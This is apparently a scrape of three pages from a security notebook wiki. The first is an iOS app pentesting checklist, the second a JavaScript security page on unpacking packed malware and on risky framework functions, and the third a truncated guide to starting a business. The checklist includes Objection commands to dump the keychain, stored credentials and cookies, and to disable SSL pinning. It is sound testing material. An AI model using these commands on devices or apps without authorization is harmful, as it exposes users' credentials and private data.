Emulator such as [Corellium](https://www.corellium.com/) , [Appetize.io](https://appetize.io/) - Install [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF) for Static Analysis - Copy git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git **Pulling IPA from App Store:** * Install IPATool on Mac: `brew tap majd/repo && brew install ipatool` * Authenticate to the tool -`ipatool auth -e ` * Search for an app in the App Store - `ipatool search ` * Download an app based on the bundle ID from search command - `dipatool download --bundle-identifier ` #### [](https://martian1337.gitbook.io/notes/notes/appsec/checklists/ios-pentesting-checklist#application-testing-setup) Application Testing setup 1. Install iproxy `npm install iproxy` and BurpSuite application proxy on host 2. Start Burp suite and add a listener on port 8082 for all interfaces 3. Go to iOS settings, set a manual proxy using the Burp Suite host's IP and port 8082 4. Connect host PC to mobile device using SSH through iproxy using a. `iproxy 2222 22 & ssh -R 8082:localhost:8082 root@localhost -p 2222` 5. On iOS device visit http://burpsuite to verify connectivity and download Burp CA certificate 6. Go to apple device settings in the "profile downloaded" section and install certificate 7. Go Settings >General >About > Certificate Trust Settings and activate toggle switch #### [](https://martian1337.gitbook.io/notes/notes/appsec/checklists/ios-pentesting-checklist#methodology) Methodology Source: [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06b-basic-security-testing](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06b-basic-security-testing) \\ 1. Download app from appstore OR install ipa file from local machine to iphone 2. Proxy iphone with iproxy this will establish a usb connection * iproxy 2222 22 & ssh -R 8082:localhost:8082 root@localhost -p 2222 3. Proxy traffic through burp 4. Pull ipa off the phone to a local directory by using frida-ios-dump * a. python3 dump.py -l (this will check all the files on the phone) * b. python3 dump.py com.example.ipa 5. Make a copy of the file and rename it to Payload.zip 6. Unzip the file from the command line * Unzip example.ipa OR unzip in the file location 7. From finder go into the Payload folder and into the next payload folder. This is where the example.app is stored 8. Right click on the example.app and click show package contents 9. Look at all the files. Some can be opened in xcode 10. Look more specifically at the info.plist file and open it with xcode * Plists generally have a lot of info and this is where we can find API keys and other juciy items 11. Open and look at json files if any are available. 12. Run mobsf and drop the example.ipa file in * Mobsf is not as verbose with ios compared to android which is why we do more of a manual click through of the files * Still use it as it can save some time 13. Run Objection * objection --gadget com.example.ipa explore * Once objection is running use the follow commands to search and dump different files * Check binary info * ios info binary * Check Ios KeyChain * ios keychain dump * Check plist files * ios plist cat info.plist * Check user credential storage * ios nsurlcredentialstorage dump * Check userdefaults * ios nsuserdefaults get * Check cookies * ios cookies get * Disable cert pinning * ios sslpinning disable --quiet * If you have issues with sslpinning you can use sslkillswitch or try patching with objection manually 14. Do a manual click through and generate some traffic with burp 15. Run a burp scan 16. Test app like it’s a web app. (XSS, SQL injection, login bypass etc) 17. Check IOS logs * a. Connect the iPhone or iPad you want to view logs for to a Mac by using a USB connection, be sure to unlock the iOS device as well * b. Open the “Console” app on Mac OS, found in the /Applications/Utilities/ directory * c. From the Console app sidebar, look under the ‘Devices’ section and select the iPhone or iPad that is connected to the Mac [PreviousAndroid Pentesting Checklist](https://martian1337.gitbook.io/notes/notes/appsec/checklists/android-pentesting-checklist) [NextThick Client Pentesting Checklist](https://martian1337.gitbook.io/notes/notes/appsec/checklists/thick-client-pentesting-checklist) Last updated 1 year ago --- # JavaScript Security Analysis | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis.md) . #### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#recursive-packing-and-unpacking) Recursive Packing and Unpacking From the previous example, it is clear that the function we extracted is still heavily obfuscated. While examining the code, we can notice additional packing functions even after the first layer has been unpacked. This technique is known as **recursive packing** and is frequently used in malware. The main goal of recursive packing is to bypass security detection. Many modern antivirus programs can automatically unpack code, sometimes even through several layers. However, some scanners struggle when the packing is repeated multiple times. Because of this limitation, malicious software often wraps its code in several layers of packing to make analysis more difficult. To fully reveal the original code, a process called **recursive unpacking** must be performed. The typical steps are: 1. Locate a packing function that begins with something like `eval(function(p,a,...`. 2. Remove or cut that function from the formatted code (for example, from Prettier). 3. Open the JavaScript console and run `console.log(p)`. 4. Copy the output generated in the console. 5. Paste this output back into [Prettier](https://prettier.io/) in place of the function that was removed. 6. Move the beautified code from the right panel to the left panel. 7. Repeat the same process. This cycle continues until every packing layer has been removed and the code is completely unpacked. * * * ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#react-related-exploits) **React-Related Exploits:** 1. `React.createElement()`: If user-controlled data is passed as a prop without proper sanitization, it could lead to XSS attacks. 2. `dangerouslySetInnerHTML`: As the name implies, this can potentially open up to XSS attacks if the input isn't sanitized. 3. `setState()`: If user-controlled input is passed to setState and then rendered without proper sanitization, it could lead to XSS attacks. 4. `componentDidMount()`, `componentDidUpdate()`: React lifecycle methods that run after the initial render and after every update, respectively. If these methods include user-controlled data that isn't properly sanitized, they can potentially lead to XSS attacks. 5. `props.children`: If not sanitized and user-controlled, could potentially open up to XSS attacks when rendered. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#angular-related-exploits) **Angular-Related Exploits:** 1. `http.get()`, `http.post()`: If the URL or parameters are not properly validated, they could potentially be used for SSRF or even RCE attacks. 2. `.subscribe()`: If the data received via the subscription isn't properly sanitized, it could lead to Code Injection or XSS attacks. 3. `.toPromise()`: If not properly sanitized, could lead to similar exploits as `.subscribe()`. 4. `ng-bind-html`: Angular directive that binds innerHTML to the result of an expression. If not properly sanitized, it can lead to XSS attacks. 5. `{{ }} interpolation`: Angular's double curly braces are used for data binding. If the data isn't sanitized properly, it could lead to XSS attacks. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#vue.js-related-exploits) **Vue.js-Related Exploits:** 1. `v-html`: This directive can lead to XSS attacks if the bound input isn't sanitized. 2. `v-bind`: If the bound expression isn't properly sanitized, it could lead to XSS attacks. 3. `v-on`: If the bound handler code isn't properly sanitized, it could potentially lead to Code Injection attacks. 4. `v-model`: Two-way data binding directive. If user-controlled input is bound and used without proper sanitization, it could lead to XSS attacks. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#express.js-related-exploits) **Express.js-Related Exploits:** 1. `app.get()`, `app.post()`: If user input is processed without proper sanitization in the callback functions, they could potentially lead to Code Injection or Command Injection attacks. 2. `res.send()`: If user input is included without proper sanitization, it could potentially lead to HTTP Response Splitting attacks. 3. `req.query`, `req.body`, `req.params`: These properties could potentially be used for SQL Injection or NoSQL Injection attacks if they aren't properly sanitized. **Node.js Built-in Modules:** Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine. 1. `fs.readFile()`, `fs.writeFile()`: These methods read from and write to files, respectively. If file names or content are user-controlled and not properly sanitized, this could lead to Path Traversal or Arbitrary File Overwrite vulnerabilities. 2. `child_process.exec()`: Executes a shell command. If the command or arguments are user-controlled, this could lead to Command Injection attacks. 3. `crypto.createCipher()`: Creates a Cipher object, with the specified algorithm and password. If algorithm or password are user-controlled, this could lead to weak encryption and the exposure of sensitive data. 4. `http.createServer()`: Creates a new instance of http.Server. If request handlers aren't properly set up, it can potentially lead to security issues like open access to sensitive resources. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#jquery-related-exploits) **jQuery-Related Exploits:** jQuery is a fast, small, and feature-rich JavaScript library. 1. `jQuery.ajax()`: Makes an HTTP request. If the URL or data are not properly validated or sanitized, it could potentially be used for SSRF or XSS. 2. `.html()`: Sets or returns the content of selected elements. If not properly sanitized, it can lead to XSS attacks. 3. `.append()`, `.prepend()`, `.before()`, `.after()`: Insert content, specified by the parameter, to the end/beginning of each element in the set of matched elements. If the content is user-controlled and not sanitized, it can lead to XSS attacks. 4. `.load()`: Loads data from a server and places the returned HTML into the matched elements. If the server isn't trusted, it can lead to Code Injection or XSS attacks. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#socket.io-related-exploits) **Socket.io-Related Exploits:** Socket.IO is a library for real-time web applications. It enables real-time, bidirectional, and event-based communication between the browser and the server. 1. `socket.emit()`, `socket.on()`: These methods send and handle custom events. If event names or data are user-controlled and not sanitized, they could potentially lead to Code Injection attacks. **Mongoose-Related Exploits:** Mongoose provides a straightforward, schema-based solution to model your application data for MongoDB. 1. `.find()`, `.findOne()`, `.update()`: These Mongoose methods can potentially be used for NoSQL Injection attacks if the filter or update objects contain user-controlled input and are not properly sanitized. 2. `mongoose.connect()`: Connects to a MongoDB database. If the connection string is user-controlled, this could potentially lead to SSRF or unauthorized access to the database. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#electron-related-exploits) **Electron-Related Exploits:** Electron is a framework for creating native applications with web technologies like JavaScript, HTML, and CSS. 1. `webContents.executeJavaScript()`: This method can be used to run JavaScript on the renderer process (web page). If user-controlled input is injected into this function without proper sanitization, it could lead to Remote Code Execution. 2. `webContents.loadURL()`: This method loads the URL in the window. If the URL is user-controlled and not validated, it could lead to Universal Cross-site Scripting (UXSS) or Remote Code Execution. 3. `shell.openExternal()`: This method opens the given external protocol URL in the desktop's default manner. If the URL is user-controlled and not validated, it could be used for URL Scheme Hijacking attacks. 4. `new BrowserWindow()`: If the `nodeIntegration` or `contextIsolation` options are not set correctly when creating new windows, it could lead to Remote Code Execution. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#d3.js-related-exploits) **D3.js-Related Exploits:** D3.js is a JavaScript library for producing dynamic, interactive data visualizations in web browsers. 1. `d3.json()`, `d3.csv()`, `d3.xml()`: These methods load external JSON, CSV, or XML data. If the URL or the way the data is used is user-controlled and not properly validated or sanitized, it could lead to Data Injection attacks or Cross-Site Scripting. 2. `d3.select()`, `d3.selectAll()`: These methods select an element or elements from the document. If the selector is user-controlled and not properly sanitized, it could potentially be used for DOM-Based Cross-Site Scripting attacks. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#lodash-related-exploits) **Lodash-Related Exploits:** Lodash is a modern JavaScript utility library delivering modularity, performance, and extras. 1. `_.template()`: This method compiles JavaScript templates into functions that can interpolate values. If user-controlled data is used as a template without proper sanitization, it could lead to Template Injection attacks. 2. `_.merge()`, `_.extend()`: These methods are used to merge two or more objects. If a user-controlled object is merged without validation, it could potentially lead to Prototype Pollution, which in turn can lead to more severe vulnerabilities like Remote Code Execution. 3. `_.set()`: This method sets the value at a path of an object. If the path is user-controlled and not validated, it could lead to Prototype Pollution. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#three.js-related-exploits) **Three.js-Related Exploits:** Three.js is a cross-browser JavaScript library and API used to create and display animated 3D computer graphics in a web browser. 1. `THREE.ObjectLoader.parse()`: This function parses a JSON structure and creates objects. If the JSON input is user-controlled and not validated, it could potentially be used for JSON Injection attacks. 2. `THREE.FileLoader.load()`: This function loads a file at the specified URL. If the URL is user-controlled and not validated, it could potentially be used for SSRF attacks. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#axios-related-exploits) **axios-Related Exploits:** Axios is a Promise-based HTTP client for the browser and Node.js. 1. `axios.get()`, `axios.post()`: Similar to http.get/post from Angular. If the URL or parameters are not properly validated, they could potentially be used for SSRF or even RCE attacks. 2. `axios.create()`: Creates a new Axios instance. If the configuration is user-controlled and not validated, it could potentially be used for Misconfiguration attacks. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#redux-related-exploits) **Redux-Related Exploits:** Redux is an open-source JavaScript library for managing application state. 1. `store.dispatch()`: This function dispatches an action to the Redux store. If the action or its payload is user-controlled and not validated, it could potentially be used for State Manipulation attacks. 2. `createStore()`: This function creates a Redux store. If the reducer is user-controlled and not validated, it could potentially lead to State Manipulation or even Code Injection attacks. **Knex.js-Related Exploits:** Knex.js is a "batteries included" SQL query builder for Postgres, MSSQL, MySQL, MariaDB, SQLite3, Oracle, and Amazon Redshift. 1. `knex.raw()`: This function allows raw SQL to be executed. If the raw SQL includes user-controlled input, it could potentially lead to SQL Injection attacks. 2. `knex.select()`, `knex.where()`: These methods are used to build queries. If the column names or values are user-controlled and not validated, they could potentially lead to SQL Injection attacks. **Moment.js-Related Exploits:** Moment.js is a free and open-source JavaScript library that removes the need to use the native JavaScript Date object directly. 1. `moment.parseZone()`: This method parses a string and converts it into a moment object in a specified timezone. If the input string is user-controlled and not validated, it could potentially lead to Parsing Manipulation attacks. 2. `moment.tz()`: This function allows for converting dates between timezones. If the timezone parameter is user-controlled and not validated, it could potentially lead to Timezone Manipulation attacks. **Passport.js-Related Exploits:** Passport.js is authentication middleware for Node.js, extremely flexible and modular, that can be unobtrusively dropped into any Express-based web application. 1. `passport.authenticate()`: This function authenticates requests. If the strategy or options are user-controlled and not validated, they could potentially lead to Authentication Bypass attacks. > These methods aren't inherently insecure, and using them isn't an automatic security risk. The potential for exploitation arises when these methods are used improperly, specifically when dealing with user input. [PreviousHow to setup a GitHub Action for Code Security analysis](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/how-to-setup-a-github-action-for-code-security-analysis) [NextJava Security 101](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/java-security-101) Last updated 3 months ago * [React-Related Exploits:](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#react-related-exploits) * [Angular-Related Exploits:](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#angular-related-exploits) * [Vue.js-Related Exploits:](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#vue.js-related-exploits) * [Express.js-Related Exploits:](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#express.js-related-exploits) * [jQuery-Related Exploits:](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#jquery-related-exploits) * [Socket.io-Related Exploits:](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#socket.io-related-exploits) * [Electron-Related Exploits:](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#electron-related-exploits) * [D3.js-Related Exploits:](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#d3.js-related-exploits) * [Lodash-Related Exploits:](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#lodash-related-exploits) * [Three.js-Related Exploits:](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#three.js-related-exploits) * [axios-Related Exploits:](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#axios-related-exploits) * [Redux-Related Exploits:](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis#redux-related-exploits) --- # Starting a Business | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business.md) . [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#explore-your-motivations-and-skills) Explore Your Motivations and Skills ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ **Goal:** Decide that it’s worth the time and effort to move forward with this idea, or realize that starting a business is wrong for you. Starting a business can be exciting and challenging, but it is usually the riskiest of the four entrepreneurial options. Success requires more than the desire to have your own business and be your own boss. This Step is designed to help you sort out your skills and interests, so that you make an informed decision. Starting a business from scratch offers you the potential for great financial reward, but it could also mean that you’ll lose everything. It is a life-altering decision, especially if you have never started or run a business on your own before. And if you have spent most of your career as an employee in an organization, you should be doubly cautious to carefully examine your motivations and skills before you decide to do this. Knowing who you are, what you want, and why you want it, will propel you in the right direction. At the very beginning of your thinking about this option, you want to do some self-examination to consider: * Your assets (both personal and financial) * Your lifestyle needs * Your support systems Assessing your motivations, skills, interests, assets and liabilities will help you get a clearer picture of why you’re drawn to this possibility, what you bring to it, and where you may want to look for experienced assistance. It’s the rare person who has all of the skills and ability to successfully start and run a business, and you don’t want to underestimate what it takes to succeed in a business start-up. People who know themselves well (and know when to call on others for help) are the ones most likely to succeed at this. **Questions to ask:** * Why do I want to start my own business? Why am I considering starting a business from scratch rather than purchasing an ongoing business or buying a franchise? Why not work for someone else? What do I hope to gain, professionally and personally? * Do I have all of the business skills, financial resources, and personal support to make a new business a success? What are my greatest strengths and assets? What are my most serious weaknesses and liabilities? What do I need to learn? * Will I enjoy starting a business? Will the daily activities, challenges, and responsibilities satisfy me? Will I enjoy the lifestyle? * How will my life be different? What will a typical day be like? A typical week? Will it be fun for me? * How will my family, friends, business associates and others respond to this? What impact might this have on those relationships? * What do I really know about starting a business? What reading or research have I done? Who have I talked to about this career option? * Is this the right time in my life to pursue this option? [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#define-and-test-your-business-idea) Define and Test Your Business Idea ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- **Goal:** You’ve described the business in a way that allows others to react to the idea. Defining your business means more than saying that you want to sell mega widgets over the Internet, convert your home into a bed & breakfast, or start up an advertising agency. It means seeing your business idea from your customer’s point of view, not just yours. So, in addition to describing your product or service, you need to identify your target market, describe who your customers will be, and how you will meet their needs. You also need to see what the competition is like in the field you intend to enter. If there is a lot of entrenched competition, you’ll need to be very clear on your competitive advantage. You will also need to lay out plainly why customers might move away from places where they already do business and buy from you. If there seems to be little competition, then ask yourself: why? Is this really a great untapped opportunity, or are there valid reasons why no one else is doing it? In either case, you must define what key success factors will make your business idea successful. Your definition must also address product/service feasibility and the price/value relationship. Can it be done, and can you offer and sell it at a price people are willing to pay? Finally, seek objective feedback from several sources to ensure that you don’t spend time, effort, and money on an idea that appeals to you but to no one else. Share your business definition with at least three experienced business people, preferably in the industry you’re exploring. (Be sure they sign a Non-Disclosure Agreement (NDA). Consider what they say seriously. Even if they’re not wild about it, the discussion can help you refine it. As you proceed, always summarize your notes on your computer and save them. You’ll use them again when you start putting your plan together. **Questions to ask:** * What specifically are the products or services I intend to offer? * What’s my target market (industries, organizations, locations, size, etc.) for these products or services? * Who are my likely customers? What do they see as their needs? What will they see as the benefits of my products or services? * Does my idea address a genuine need in the marketplace? Is there, or could there be, a demand for my product or service? Will the demand be strong enough to support a business? * How crowded is the market? Are there many or few competitors? What will make my business unique? What will distinguish it from the competition? * Have others tried this idea before? If so, what were the results and why? * Is this product or service feasible? Given the anticipated costs involved, will I be able to deliver products or services at a competitive price? Will customers pay what I have to charge? * Do I have the skills, knowledge and resources to make this business a success? [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#create-your-board-of-advisors) Create Your Board of Advisors ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ **Goal:** Line up three to six people who will provide straight advice on starting a business, especially in areas where your skills are less developed. Most large organizations have a board of directors to help shape strategy and offer advice and counsel. Very few people starting a business are expert in all areas. As a result, many successful start-ups have a board of advisors, which enables the owner to tap into the know-how of people who have specialized knowledge, experience, and expertise, and are not afraid to express their honest opinions. A board of advisors can increase your chances of success in two ways: by providing the professional advice you need to evaluate and establish a business, and by assisting in your transition to owner/operator. Begin by identifying the kind of expertise you need, then find appropriate people to provide it. Make sure that you feel comfortable with the people you choose, as you will need to be forthright with them. And select people who will ask tough questions and openly oppose bad ideas. You will need an attorney with start-up experience to help on business structure, licenses, contracts, copyrights, and liability issues. An experienced small business accountant can help you evaluate business strategies, cash flow projections, tax considerations, risks, revenue and expense tracking as well as insurance. You’ll also want advisors who run successful, non-competitive small businesses, particularly if they started them. You may meet with your entire board of advisors occasionally, but you will generally call on them individually for specific advice in their area of specialty. Some of your advisors will be paid. You may trade out services with others, and some may be friends or acquaintances that you enlist for support as well as expertise. But choose wisely. Choose advisors whom you respect, trust, and will listen carefully to their advice and wisdom. **Questions to ask:** * Does the advisor have experience in an area where I need assistance? * For advisors I do not know well, have I spoken with people who have worked with them to check out their skills and reputations? * If the advisor charges fees, are they appropriate? * Do I feel comfortable with the advisor? Will the person be objective, willing to say no to unsound ideas, and speak up about tough or critical issues? * Which of the following specialties should I consider for my board of advisors? * Accountant (experienced in business start-ups) * Attorney (experienced in business start-ups) * Commercial banker with small business experience * Financial planner * Seasoned business people * Industry and functional experts * Marketing consultant * Independent sales representative * Insurance specialist * Consultant * Current small business owners * Individuals who have started businesses in the past * Potential customers or suppliers in the industry I am pursuing [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#investigate-financing) Investigate Financing -------------------------------------------------------------------------------------------------------------------------------------------------------------- **Goal:** Know how much capital you have and are willing to put into the business, and where to go for more. Some businesses are relatively easy to start, while others require hundreds of thousands of dollars just to enter the game. Many entrepreneurs tend to underestimate expenses and overestimate how quickly the business will produce income. Let’s face it, you probably won’t see a paycheck for the first year or two. You’ll also need a cushion for unforeseen events (which are bound to happen). All of this can add up to a significant sum. Your start-up will surely fail if you go broke. You need to take stock of your personal financial resources. Sort out your short and long-term needs, particularly your cash flow, and determine how much money you might realistically risk to establish and operate a business. Consider discussing this with your family and a financial advisor. The next step is to seek the counsel of your accountant who can recommend funding strategies and sources, if needed. If you need to supplement your own funds, estimate how much additional capital you’ll need from investors or through loans. You’ll have to share your personal balance sheet with investors or lenders, so your finances must be well organized and your credit history clean. Naturally, investors and lenders will expect your significant participation in any financial risk. Research lending or investment institutions to find out how they like to be approached, what kind of projects they prefer, and what kind of documents they require before considering participation. Your board of advisors may help with introductions. Speaking with potential investors or lenders early will make you better informed when you approach them with your finished proposal, and wish to line up the financing. Keep good notes of these discussions. **Questions to ask:** * What sources of capital or security do I have at my disposal (savings, deferred income accounts, credit lines, home equity loans, insurance policies, IRAs, 401Ks, houses, cars, jewelry, etc.)? * What are my short-term and long-term personal cash flow needs? Do I have children approaching college age? * What percentage of my current net worth am I willing to put at risk? * Should I use an accountant or financial planner to suggest the best ways to organize and leverage my personal financial picture? * Will I need loans from individuals, institutions or the franchiser? * How long a payout period do I anticipate before I’m able to start taking money out of the business? * If I am considering going into business with a partner or investors, do I know what their goals are? How will define our roles and responsibilities? What about control issues and voting rights? * What will an investor or lender want from me? [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#choose-your-market-niche) Choose Your Market Niche -------------------------------------------------------------------------------------------------------------------------------------------------------------------- **Goal:** Tell three potential customers about your idea, and get favorable reactions. The one and only thing essential to the success of any business is the customer. Someone must purchase your product or service, or you go out of business. Of course, one of the benefits of starting your own business is that you can exercise some choice over who your customers will be by designing a business that caters to a specific market. In **Step 2**, you took a preliminary look at your target market, potential customers and their needs. Now it’s time to do some research in depth so that you can confirm or refine your business definition. Then you can focus your business on a specific, clearly defined market. You need to know as much about your industry and the demographics and psychographics of your customers as possible. Study and identify the major trends that are having or could have an impact on the kind of business you intend to start. Try to get a handle on how long your products and services will be viable in the market you’ve targeted. Get a broad and detailed view of the market as a whole, and your local market. Talk with people in your target markets, consultants in those markets, leaders of professional or trade associations, and with potential customers and suppliers. Read the trade journals and search the Internet for additional information. Depending on your business, you may wish to conduct surveys or interviews with potential customers to gather more concrete data about the buying habits, price points and reactions of real potential customers for your products or services. Try to get at least three potential customers to comment. If necessary, refine your business definition based on the feedback and information you pick up. **Questions to ask:** * What is my target market? Can I make a list of prospective customers? * How would I describe my individual customers (age, income, education, gender, geography, specific background, interests, attitudes, etc.) * What are my customers’ needs? What are their wants? * What do they buy now to meet the need I will fill? What else might they buy? * What do they pay? What will they pay? * When, why, and how do they buy? * What are the major trends that will have an impact on my potential customers and my business? What is likely to have an impact on the need for these products/services in the future? What could the market look like five years from now? * How often do they change vendors for this product or service, and why? * Which market niche should I choose to focus on as I get my business started? [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#select-your-site-location) Select Your Site/Location ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- **Goal:** Identify an appropriate location for your business. For many businesses location can mean the difference between success and failure. Retail outlets and hospitality businesses such as restaurants, hotels, hair salons, and plant nurseries, location is everything. Small service businesses and individual practitioners sometimes use a prestigious address to create the right image and impress customers and clients. Sometimes a residential address or post office box is appropriate, and sometimes it’s not. If you are opening a retail operation, location will be a primary concern. Keep in mind that a less desirable location with a less expensive lease may end up costing more by the time you add in advertising and promotion costs required to generate traffic. Higher location cost can sometimes be offset by additional foot traffic by the store front, by favorable image creation, or by savings in advertising. If you rent, remember that leases are always negotiable. Since leases can be a major cost of doing business, you’ll want to involve your accountant and a Commercial Real Estate Agent/Broker to assist you in negotiating the lease agreement. If you plan to operate your business from your home, remember to research local zoning restrictions and required insurance. Should you determine that your home office doesn't work for meeting clients and suppliers, then consider renting an office or conference room (as needed) with a local shared office space provider. Take your time researching locations before making a commitment. Visit competitors’ locations and analyze why they chose to locate where they did. **Questions to ask:** * How important is foot traffic to my success? Will I depend on people walking in to my business? On vehicle traffic? Is parking available? * Is there a particular office park, strip mall, covered mall, collection of fast food restaurants, or commercial thoroughfare I should be located in, on or near? * How do I want my target market to perceive my business? What image do I want to project? What location will help establish and maintain that image? * What kind of advertising expense is implied by the different locations I’m looking at (if applicable)? * Where have my competitors set up their businesses? Why did they choose their locations? * What impact will the locations I am considering have on my customers? How will they find me? How will I distribute my product or service from these particular sites? * What help can I get from trade associations? From Chambers of Commerce or state or county business development agencies? Which advisors can offer me good advice and recommendations? [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#analyze-the-competition) Analyze the Competition ------------------------------------------------------------------------------------------------------------------------------------------------------------------ **Goal:** Understand the strengths and weaknesses of your competition. By now, you have garnered information, opinions, observations and facts about the business you want to start. You have identified the specific market you want and selected potential sites. Now it is time to investigate and analyze another factor that can determine your success or failure — the competition. You need to know how the competition positions and prices their products and services and how they approach your potential customers. Survival as a business sometimes requires that you outperform your competitors in the eyes of your customers. You cannot do this without really understanding how your competition operates, how they are positioned in the minds of their customers and prospects, and why their customers choose to do business with them. This education begins with a visit to every competitor you may face in the marketplace that handles products or delivers services similar to the ones you plan to sell. A visit can be made in person, to their website or through their advertising. Talk to anyone who may have done business a competitor. Keep a file on each competitor and use the information to differentiate your business from theirs. These are four critical areas in any business of any size: operations, sales, marketing, and financial management. To the extent that you can, profile the strengths and weaknesses of each of your competitors on these four dimensions. Then, do the same thing on your own idea. This will help you identify factors that distinguish your business, and assist greatly when you develop your business plan. You don’t want to plan only in response to your competition, but you certainly need to factor them in as you develop your own positioning, pricing and marketing strategies. **Questions to ask:** * What is the competition? What about future competition? Is there a competing service or product emerging (such as e-mail was to fax machines)? * Who are the leaders in the business? Why are they special? On what basis do they compete? Quality? Price? Service? Convenience? Guarantees? What else? * How does my business compare? * How broad a service or product line does my competition offer? Are they strong in all areas? Strong in some, weaker in others? * How do they display, advertise or promote their products or services? Why do they do what they do? * How do they handle customers? How do they present themselves to customers? * What image does their advertising or website convey? Who do their messages speak to? How do they motivate people to buy? What kind of expectations does their message strategy create? * What are some competitive weaknesses I can exploit? What will make my business stand out? How will my business have to be positioned and perceived to succeed? [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#determine-the-legal-structure-of-the-business) Determine the Legal Structure of the Business -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- **Goal:** You have a name, a structure, and have begun protecting yourself. No matter how large or small your venture, you need to determine the right legal structure for your business. In general, there are four forms of organization to choose from: sole proprietorship, partnership, corporation, or limited liability company (LLC). Many business owners choose the simplest organizational structure, a sole proprietorship. It is easy to file for and gives you the right to do business using whatever name you select. Although this is the least complex and least expensive business structure to establish, there may be tax disadvantages and liability issues. Another form of organization is a partnership, although it is used less today than it has been in the past. In this form you share responsibility for the business with other owners. This type of structure can be complex both personally and legally. A common form of organization is a corporation. A corporation is the most expensive and can be difficult to dissolve, but there may be advantages to the extra work and expense, depending on the type of business you are establishing. Research the different types of corporations, including subchapter S corporations and the LLC. The [IRS](https://www.irs.gov/businesses/small-businesses-self-employed/starting-a-business) and the [SBA](http://www.sba.gov/) offer helpful information. You may want to secure other rights, permits and licenses. You will need to conduct a name search and secure the rights to use the business name you have selected. And you may wish to seek legal protection for such elements as trademarks, logos, slogans and proprietary products. Consult an experienced attorney to advise you on the legal structure, liabilities, and protections, and an accountant to help sort through the tax implications of each structure. **Questions to ask:** * Do I understand the advantages and disadvantages of the various business structure options? * If incorporating, have I explored the different types of corporate structures and evaluated the pros and cons of each? * Have I come up with a name for the business, tested it in the marketplace, secured the rights to use it, and registered it with local, state of federal authorities? * Do I have a list of the permits and licenses I will need to secure to do business legally, such as a tax identification number, state and municipal licenses, state or municipal sales tax and resale tax certificates? * Am I fully aware of local zoning restrictions in the area? * Have I applied for copyrights, trademarks or patents to protect my business ideas, products, brand names, and marketing slogans? * Have I identified experts who I trust to help me sort through these issues? [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#prepare-a-detailed-implementation-schedule) Prepare a Detailed Implementation Schedule -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- **Goal:** Work up a pre-opening checklist, and check it out with others. While your business plan outlines the overall strategy for your business, the implementation schedule is more the tactical component. It lays out precisely what must 